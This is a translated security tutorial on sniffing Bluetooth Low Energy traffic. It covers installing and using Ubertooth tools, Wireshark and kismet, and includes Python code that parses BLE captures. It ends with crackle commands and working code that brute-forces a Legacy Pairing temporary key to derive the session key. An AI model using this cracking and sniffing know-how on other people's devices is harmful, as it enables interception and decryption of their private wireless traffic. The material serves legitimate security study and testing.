A Gentle Deep Dive into the Bluetooth Low Energy (BLE) Protocol Stack (Hands-On Part)

Author: FB客服
Published 2020-12-09 15:54:29
Column: FreeBuf

Environment Setup

The previous part covered the packet formats and the individual protocol layers; now we will use an Ubertooth One to capture the Bluetooth packets exchanged during communication.

(1) Install library dependencies

The build steps below pin the 2015-09-R2 releases of libbtbb and ubertooth. The two must be the same release, because the Ubertooth host tools link against a matching libbtbb; mixing releases is the most common reason the build or the tools fail.

apt-get install python-software-properties
add-apt-repository ppa:pyside
apt-get update
apt-get install libnl-dev libusb-1.0-0-dev pyside-tools

(2) Install libbtbb

wget https://github.com/greatscottgadgets/libbtbb/archive/2015-09-R2.tar.gz -O libbtbb-2015-09-R2.tar.gz
tar xf libbtbb-2015-09-R2.tar.gz
cd libbtbb-2015-09-R2
mkdir build
cd build
cmake ..
make
sudo make install

(3) Install ubertooth

wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-09-R2/ubertooth-2015-09-R2.tar.xz -O ubertooth-2015-09-R2.tar.xz
tar xf ubertooth-2015-09-R2.tar.xz
cd ubertooth-2015-09-R2/host
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig

(4) Install Wireshark

sudo apt-get install checkinstall
wget https://www.wireshark.org/download/src/wireshark-2.0.3.tar.bz2
tar -xvf wireshark-2.0.3.tar.bz2
cd wireshark-2.0.3
./configure
make
sudo make install    # or 'sudo checkinstall' to build a removable .deb instead of installing directly

(5) Install kismet

wget https://kismetwireless.net/code/kismet-2013-03-R1b.tar.xz
tar xf kismet-2013-03-R1b.tar.xz
cd kismet-2013-03-R1b
ln -s ../ubertooth-2015-09-R2/host/kismet/plugin-ubertooth .
./configure
make && make plugins
sudo make suidinstall
sudo make plugins-install

(6) Install the BLE decryption tool crackle

crackle (open-source project)

git clone https://github.com/mikeryan/crackle.git
cd crackle
make
sudo make install

Open kismet's configuration file, kismet.conf, and add "pcapbtbb" to its logtypes= line so that the Bluetooth baseband packets captured through the Ubertooth plugin are written to disk as pcap.

Sniffing and Scanning

(1) spectool

spectool_curses

spectool_gtk scans nearby signals and displays them on a spectrum plot:

spectool_raw: "raw" here presumably means unprocessed, so this should display the raw signal data the device captures:

spectool_net turns the Ubertooth One into a "hardware server" listening on TCP port 30569; any PC on the LAN that can reach the host can share the device through the Ubertooth host's IP address and port 30569. To connect, run spectool_gtk on the other host,

choose Open Network Device, and enter the IP address and port.

(2) hcitool

root@0xroot:~# hcitool --help
hcitool - HCI Tool ver 4.99
Usage:
    hcitool [options] <command> [command parameters]
Options:
    --help    Display help
    -i dev    HCI device
Commands:
    dev     Display local devices
    inq     Inquire remote devices
    scan    Scan for remote devices
    name    Get name from remote device
    info    Get information from remote device
    spinq    Start periodic inquiry
    epinq    Exit periodic inquiry
    cmd     Submit arbitrary HCI commands
    con     Display active connections
    cc      Create connection to remote device
    dc      Disconnect from remote device
    sr      Switch master/slave role
    cpt     Change connection packet type
    rssi    Display connection RSSI
    lq      Display link quality
    tpl     Display transmit power level
    afh     Display AFH channel map
    lp      Set/display link policy settings
    lst     Set/display link supervision timeout
    auth    Request authentication
    enc     Set connection encryption
    key     Change connection link key
    clkoff    Read clock offset
    clock    Read local or remote clock
    lescan    Start LE scan
    lewladd    Add device to LE White List
    lewlrm    Remove device from LE White List
    lewlsz    Read size of LE White List
    lewlclr    Clear LE White list
    lecc    Create a LE Connection
    ledc    Disconnect a LE Connection
    lecup    LE Connection Update

hcitool scan: scan for nearby classic (BR/EDR) Bluetooth devices

hcitool lescan: scan for nearby Bluetooth Low Energy devices (requires a Bluetooth 4.0 or later local adapter)

(3) gatttool

gatttool speaks GATT/ATT to an LE device: discover primary services and characteristics, then read or write characteristic values by handle. Its -l/--sec-level option sets the security the link must have (medium = encrypted, high = authenticated and encrypted); at the default low level an unprotected device hands over its characteristic values without any pairing, which is exactly the weakness to test for. In recent BlueZ releases hcitool and gatttool are deprecated in favour of bluetoothctl, but they remain the tools used throughout this article.

root@0xroot:~# gatttool -h
Usage:
  gatttool [OPTION...]

Help Options:
  -h, --help                                Show help options
  --help-all                                Show all help options
  --help-gatt                               Show all GATT commands
  --help-params                             Show all Primary Services/Characteristics arguments
  --help-char-read-write                    Show all Characteristics Value/Descriptor Read/Write arguments

Application Options:
  -i, --adapter=hciX                        Specify local adapter interface
  -b, --device=MAC                          Specify remote Bluetooth address
  -m, --mtu=MTU                             Specify the MTU size
  -p, --psm=PSM                             Specify the PSM for GATT/ATT over BR/EDR
  -l, --sec-level=[low | medium | high]     Set security level. Default: low
  -I, --interactive                         Use interactive mode
gatttool -b 1C:96:5A:FF:4B:E7 -I
[   ][1C:96:5A:FF:4B:E7][LE]> help
help                                           Show this help
exit                                           Exit interactive mode
quit                                           Exit interactive mode
connect         [address]                      Connect to a remote device
disconnect                                     Disconnect from a remote device
primary         [UUID]                         Primary Service Discovery
characteristics [start hnd [end hnd [UUID]]]   Characteristics Discovery
char-desc       [start hnd] [end hnd]          Characteristics Descriptor Discovery
char-read-hnd   <handle> [offset]              Characteristics Value/Descriptor Read by handle
char-read-uuid  <UUID> [start hnd] [end hnd]   Characteristics Value/Descriptor Read by UUID
char-write-req  <handle> <new value>           Characteristic Value Write (Write Request)
char-write-cmd  <handle> <new value>           Characteristic Value Write (No response)
sec-level       [low | medium | high]          Set security level. Default: low
mtu             <value>                        Exchange MTU for GATT/ATT
[   ][1C:96:5A:FF:4B:E7][LE]>

(4) ubertooth-scan

root@0xroot:~# ubertooth-scan --help
ubertooth-scan: invalid option -- '-'
ubertooth-scan - active(bluez) device scan and inquiry supported by Ubertooth
Usage:
    -h this Help
    -U<0-7> set ubertooth device to use
    -s hci Scan - perform HCI scan
    -t scan Time (seconds) - length of time to sniff packets. [Default: 20s]
    -x eXtended scan - retrieve additional information about target devices
    -b Bluetooth device (hci0)

ubertooth-scan -s

(5) ubertooth-btle

ubertooth-btle - passive Bluetooth Low Energy monitoring
Usage:
    -h this help

    Major modes:
    -f follow connections
    -p promiscuous: sniff active connections
    -a[address] get/set access address (example: -a8e89bed6)
    -s<address> faux slave mode, using MAC addr (example: -s22:44:66:88:aa:cc)
    -t<address> set connection following target (example: -t22:44:66:88:aa:cc)

    Interference (use with -f or -p):
    -i interfere with one connection and return to idle
    -I interfere continuously

    Data source:
    -U<0-7> set ubertooth device to use

    Misc:
    -r<filename> capture packets to PCAPNG file
    -q<filename> capture packets to PCAP file (DLT_BLUETOOTH_LE_LL_WITH_PHDR)
    -c<filename> capture packets to PCAP file (DLT_PPI)
    -A<index> advertising channel index (default 37)
    -v[01] verify CRC mode, get status or enable/disable
    -x<n> allow n access address offenses (default 32)

If an input file is not specified, an Ubertooth device is used for live capture.
In get/set mode no capture occurs.

ubertooth-btle -f -ctest.pcap: follow connections and save the captured packets to a local file (here as a DLT_PPI pcap; as the help text above shows, -q writes DLT_BLUETOOTH_LE_LL_WITH_PHDR and -r writes PCAPNG).

With this command the packets the device captures are written to disk; the file can then be imported into Wireshark for packet and protocol analysis.

Bluetooth packets sniffed this way need one adjustment before Wireshark will dissect them properly; otherwise the data cannot be analysed:

Edit → Preferences → Protocols → DLT_USER → Edit → New

and enter btle as the payload protocol. This mapping is only needed when the file's link type is not one Wireshark already decodes as BLE; a capture written with -q carries DLT_BLUETOOTH_LE_LL_WITH_PHDR and is dissected as btle directly.

Filter the packets with a display filter (see Capturing BLE in Wireshark in the references):

btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05

The first clause keeps data-channel PDUs that carry a payload, dropping the empty PDUs that only keep a connection alive; the second keeps CONNECT_REQ advertising PDUs (pdu_type 0x05), which mark the start of a connection and carry the parameters (access address, CRC init, hop increment, channel map) needed to follow it.
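The display filter above can be reproduced in code, which also shows what a pcap written by ubertooth-btle -q (DLT_BLUETOOTH_LE_LL_WITH_PHDR) actually contains. The following is an added example written for this article, not code from the page, from the Ubertooth project or from Wireshark: it builds a small constructed capture (an ADV_IND, the CONNECT_REQ that answers it, an empty data PDU and an ATT Read Request; the addresses, access address and connection parameters are invented), parses each record's 10-byte pseudo-header, access address and 2-byte link-layer header, and keeps exactly the records the filter would keep. CRCs are written as zeros and are not checked.

```python
"""Parse BLE link-layer packets from a 'ubertooth-btle -q' style capture
(DLT_BLUETOOTH_LE_LL_WITH_PHDR) and apply the Wireshark display filter
    btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05
in Python. The sample capture is constructed in code, not taken from a device."""
import struct

ADV_ACCESS_ADDRESS = 0x8E89BED6       # fixed access address of the advertising channels
PDU_TYPE_CONNECT_REQ = 0x05           # advertising PDU type 5 = CONNECT_REQ
DLT_BLUETOOTH_LE_LL_WITH_PHDR = 256   # pcap link type written by 'ubertooth-btle -q'
PHDR_LEN = 10                         # rf_channel, signal, noise, aa_offenses, ref_aa(4), flags(2)
LLID_NAMES = {1: "L2CAP continuation/empty", 2: "L2CAP start", 3: "LL control"}


def parse_ll_packet(raw):
    """raw = pseudo-header | access address | 2-byte LL header | payload | 3-byte CRC."""
    if len(raw) < PHDR_LEN + 4 + 2 + 3:
        raise ValueError("record too short for a BLE LL packet")
    access_address = struct.unpack_from("<I", raw, PHDR_LEN)[0]
    hdr0, length = raw[PHDR_LEN + 4], raw[PHDR_LEN + 5]
    if len(raw) != PHDR_LEN + 6 + length + 3:
        raise ValueError("record size does not match the LL header length field")
    pkt = {"channel": raw[0], "access_address": access_address, "length": length,
           "payload": raw[PHDR_LEN + 6:PHDR_LEN + 6 + length]}
    if access_address == ADV_ACCESS_ADDRESS:     # advertising channel PDU header
        pkt.update(kind="adv", pdu_type=hdr0 & 0x0F, tx_add=(hdr0 >> 6) & 1, rx_add=(hdr0 >> 7) & 1)
    else:                                        # data channel PDU header
        pkt.update(kind="data", llid=hdr0 & 0x03, nesn=(hdr0 >> 2) & 1, sn=(hdr0 >> 3) & 1, md=(hdr0 >> 4) & 1)
    return pkt


def matches_filter(pkt):
    """Same decision as the Wireshark filter: keep data PDUs that carry a payload
    (empty PDUs only keep the connection alive) and CONNECT_REQ advertising PDUs
    (which start a connection and carry the parameters needed to follow it)."""
    if pkt["kind"] == "data":
        return pkt["length"] > 0                     # btle.data_header.length > 0
    return pkt["pdu_type"] == PDU_TYPE_CONNECT_REQ   # btle.advertising_header.pdu_type == 0x05


def summarize(pkt):
    if pkt["kind"] == "adv":
        return "ch%d adv pdu_type=%d len=%d" % (pkt["channel"], pkt["pdu_type"], pkt["length"])
    return "ch%d data aa=%08x %s len=%d" % (pkt["channel"], pkt["access_address"],
                                            LLID_NAMES.get(pkt["llid"], "reserved"), pkt["length"])


def write_pcap(records, linktype=DLT_BLUETOOTH_LE_LL_WITH_PHDR):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for ts, rec in records:
        out += struct.pack("<IIII", ts, 0, len(rec), len(rec)) + rec
    return out


def read_pcap(data):
    magic, _, _, _, _, _, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != 0xA1B2C3D4 or linktype != DLT_BLUETOOTH_LE_LL_WITH_PHDR:
        raise ValueError("expected a little-endian DLT_BLUETOOTH_LE_LL_WITH_PHDR pcap")
    off = 24
    while off + 16 <= len(data):
        ts, _, incl, _ = struct.unpack_from("<IIII", data, off)
        off += 16
        yield ts, data[off:off + incl]
        off += incl


def filter_pcap(data):
    """Return [(record index, summary)] for the records the display filter keeps."""
    return [(i, summarize(p)) for i, (_, rec) in enumerate(read_pcap(data))
            for p in [parse_ll_packet(rec)] if matches_filter(p)]


def make_record(channel, access_address, hdr0, payload):
    """One constructed capture record; the CRC is left zero (not checked here)."""
    phdr = struct.pack("<BbbBIH", channel, -60, -100, 0, access_address, 0x0001)  # flags bit 0: dewhitened
    return phdr + struct.pack("<I", access_address) + bytes([hdr0, len(payload)]) + payload + b"\0\0\0"


# Constructed sample: one advertisement, the CONNECT_REQ that answers it, then
# an empty keep-alive PDU and an ATT Read Request on the new connection.
ADV_A = bytes.fromhex("ffeeddccbbaa")                 # AdvA AA:BB:CC:DD:EE:FF (random), little-endian
INIT_A = bytes.fromhex("665544332211")                # InitA 11:22:33:44:55:66 (public)
CONN_AA = 0x50655A7F
LLDATA = struct.pack("<I3sBHHHH5sB", CONN_AA, b"\x01\x02\x03", 2, 6, 40, 0, 200,
                     b"\xff\xff\xff\xff\x1f", 0xB0)   # AA, CRCInit, WinSize, WinOffset, Interval, Latency, Timeout, ChM, Hop|SCA
SAMPLE_PCAP = write_pcap([
    (1, make_record(37, ADV_ACCESS_ADDRESS, 0x40, ADV_A + bytes.fromhex("020106"))),  # ADV_IND, TxAdd=1
    (2, make_record(37, ADV_ACCESS_ADDRESS, 0x85, INIT_A + ADV_A + LLDATA)),          # CONNECT_REQ, RxAdd=1
    (3, make_record(12, CONN_AA, 0x01, b"")),                                          # empty data PDU
    (4, make_record(12, CONN_AA, 0x06, struct.pack("<HH", 3, 4) + bytes.fromhex("0a0300"))),  # ATT Read Req
])

if __name__ == "__main__":
    for idx, line in filter_pcap(SAMPLE_PCAP):
        print(idx, line)
```

Running it lists only records 1 (the CONNECT_REQ) and 3 (the ATT Read Request); the ADV_IND and the empty data PDU are dropped, exactly as in Wireshark. Point read_pcap at a real file written with -q to apply the same logic to a live capture.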

(6) crackle

If enough packets have been captured, and in particular the pairing exchange (the btsmp packets), crackle can recover the TK and the LTK:

crackle -i <file.pcap>

Decrypt the packets and save the decrypted ones to a new file:

crackle -i <file.pcap> -o <output.pcap>
crackle -i <file.pcap> -o <out.pcap> -l <ltk>

The first two forms brute-force the TK from the sniffed Pairing Confirm and Pairing Random values (with LE Legacy Pairing the TK is 0 for Just Works or a six-digit passkey, so there are at most a million candidates), derive the STK from it, and decrypt the session, which exposes the LTK distributed during the key exchange; the -l form decrypts a later session with an LTK that has already been recovered. This only works against LE Legacy Pairing: LE Secure Connections (Bluetooth 4.2 and later) agrees keys with ECDH and cannot be cracked this way, and out-of-band pairing is also immune because its TK is a full 128-bit value rather than a small number.
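To make concrete what crackle does when it "cracks" the TK, here is an added example written for this article (it is not crackle's code and not the page's) that implements the SMP c1 and s1 functions from Bluetooth Core Spec Vol 3 Part H and brute-forces the TK from a Pairing Confirm value. AES-128 is written out in pure Python so the block runs without extra packages; all pairing values (the Pairing Request/Response bytes, addresses, Mrand, Srand and the passkey 1337) are constructed for the example, not sniffed. Recovering the LTK would additionally require AES-CCM decryption of the encrypted Encryption Information PDU under the STK, which is not shown.

```python
"""crackle-style recovery of a BLE Legacy Pairing TK from a sniffed SMP exchange,
then derivation of the STK with the spec's c1/s1 functions. AES-128 is written
out in pure Python so this runs without extra packages; the pairing values are
constructed for the example, not taken from a capture."""


def _xtime(a):                      # multiply by x in GF(2^8), polynomial 0x11B
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _rotl8(x, k):
    return ((x << k) | (x >> (8 - k))) & 0xFF


def _build_sbox():                  # inverse via generator 3, then the affine map
    sbox, p, q = [0] * 256, 1, 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF    # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF          # q /= 3
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
MUL2 = [_xtime(x) for x in range(256)]
MUL3 = [x ^ MUL2[x] for x in range(256)]


def _expand_key(key):               # 11 round keys of 16 bytes, column-major
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]                  # RotWord, SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def aes128_encrypt(key, block):
    """AES-128 single block; state kept flat in column-major order like the input."""
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                              # SubBytes
        s = [s[((c + r) % 4) * 4 + r] for c in range(4) for r in range(4)]   # ShiftRows
        if rnd < 10:                                                          # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [MUL2[a0] ^ MUL3[a1] ^ a2 ^ a3, a0 ^ MUL2[a1] ^ MUL3[a2] ^ a3,
                      a0 ^ a1 ^ MUL2[a2] ^ MUL3[a3], MUL3[a0] ^ a1 ^ a2 ^ MUL2[a3]]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]                               # AddRoundKey
    return bytes(s)


def e(k, x):
    """SMP 'e' function: AES-128 over 128-bit integers (the spec's big-endian numbers)."""
    return int.from_bytes(aes128_encrypt(k.to_bytes(16, "big"), x.to_bytes(16, "big")), "big")


def c1(k, r, preq, pres, iat, ia, rat, ra):
    """Confirm value (Core Spec Vol 3 Part H, 2.2.3): e(k, e(k, r ^ p1) ^ p2)."""
    p1 = (pres << 72) | (preq << 16) | (rat << 8) | iat    # p1 = pres || preq || rat' || iat'
    p2 = (ia << 48) | ra                                   # p2 = padding || ia || ra
    return e(k, e(k, r ^ p1) ^ p2)


def s1(k, r1, r2):
    """STK (2.2.4): e(k, LSB64(r1) || LSB64(r2)); for pairing k=TK, r1=Srand, r2=Mrand."""
    mask = (1 << 64) - 1
    return e(k, ((r1 & mask) << 64) | (r2 & mask))


def brute_force_tk(mconfirm, mrand, preq, pres, iat, ia, rat, ra, max_tk=999999):
    """Legacy Pairing TK is 0 (Just Works) or a 6-digit passkey: at most 10^6 guesses,
    each checked against the sniffed Mconfirm, which is what crackle does."""
    for tk in range(max_tk + 1):
        if c1(tk, mrand, preq, pres, iat, ia, rat, ra) == mconfirm:
            return tk
    return None


# Constructed exchange (NOT a real capture). SMP fields are little-endian over
# the air (as Wireshark's btsmp shows them); convert to the spec's integers.
PREQ = int.from_bytes(bytes.fromhex("01010000100707"), "little")  # Pairing Request: opcode, IO cap, OOB, AuthReq, key size, key dist
PRES = int.from_bytes(bytes.fromhex("02030000080005"), "little")  # Pairing Response
IAT, IA = 1, 0xA1A2A3A4A5A6                     # initiator address type / address
RAT, RA = 0, 0xB1B2B3B4B5B6                     # responder address type / address
MRAND = 0x5783D52156AD6F0E6388274EC6702EE0      # Mrand from the master's Pairing Random
SRAND = 0x0102030405060708090A0B0C0D0E0F10      # Srand from the slave's Pairing Random
PASSKEY = 1337                                  # the TK the user typed; the attacker does not know it
MCONFIRM = c1(PASSKEY, MRAND, PREQ, PRES, IAT, IA, RAT, RA)   # what the sniffer saw in Pairing Confirm


def recover_stk():
    """Crack the TK from Mconfirm, then derive the STK that encrypts the session."""
    tk = brute_force_tk(MCONFIRM, MRAND, PREQ, PRES, IAT, IA, RAT, RA)
    return tk, (None if tk is None else s1(tk, SRAND, MRAND))


if __name__ == "__main__":
    print("TK = %d, STK = %032x" % recover_stk())
```

The search returns as soon as a candidate TK reproduces the observed Mconfirm; the pure-Python AES makes this slow for large passkeys, while crackle does the same million-candidate walk in C. Nothing in the protocol prevents the guess, which is why Legacy Pairing with Just Works or a passkey offers no confidentiality against a passive sniffer that saw the pairing.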

References & Acknowledgements

Robin Heydon, Bluetooth Low Energy: The Developer's Handbook (Chinese edition 《低功耗蓝牙开发权威指南》); netdisk link https://pan.baidu.com/s/1xneDTzdejtA91go5YuDhnQ (for the password, reply "8001" to the 迈微AI研习社 WeChat account)
Sniffing and decoding NRF24L01+ and Bluetooth LE packets for under $30
Bluetooth sniffing with Ubertooth: https://dominicspill.com/kiwicon/Spill-Ubertooth-Kiwicon-2012.pdf
Now I wanna sniff some Bluetooth: Sniffing and Cracking Bluetooth with the UbertoothOne
路人甲 @ 乌云 drops: Bluetooth Low Energy 嗅探 (Bluetooth Low Energy sniffing)
疯狗 @ 乌云 drops: 物联网安全拔“牙”实战——低功耗蓝牙(BLE)初探 (IoT security "tooth-pulling" in practice: a first look at BLE)
http://j2abro.blogspot.com.au/2014/06/understanding-bluetooth-advertising.html
http://j2abro.blogspot.com.au/2014/06/analyzing-bluetooth-advertising-with.html
http://cerescontrols.com/tutorials-3/sniffing-bluetooth-packets-with-kismet-and-wireshark-in-ubuntu-12-04/
https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide
https://github.com/greatscottgadgets/ubertooth/wiki/Capturing-BLE-in-Wireshark
http://stackoverflow.com/questions/23877761/sniffing-logging-your-own-android-bluetooth-traffic
https://lacklustre.net/bluetooth/wireshark.html
https://blog.lacklustre.net/posts/BLE_Fun_With_Ubertooth:_Sniffing_Bluetooth_Smart_and_Cracking_Its_Crypto/
http://superuser.com/questions/947593/how-can-i-sniff-bluetooth-traffic-coming-from-my-and-another-device
http://www.backtrack-linux.org/forums/showthread.php?t=41552
http://www.splitbits.com/2014/05/14/ubertooth-spectools-chromebook/
http://ubertooth.sourceforge.net/usage/start/
http://hackerific.net/2012/01/28/Spectrum-Tools-and-Ubertooth-One/
https://penturalabs.wordpress.com/2014/02/20/ubertooth-updated-for-2014/
https://blog.lacklustre.net/

Originally published 2020-12-07 on the FreeBuf WeChat official account; republished through the Tencent Cloud self-media syndication program.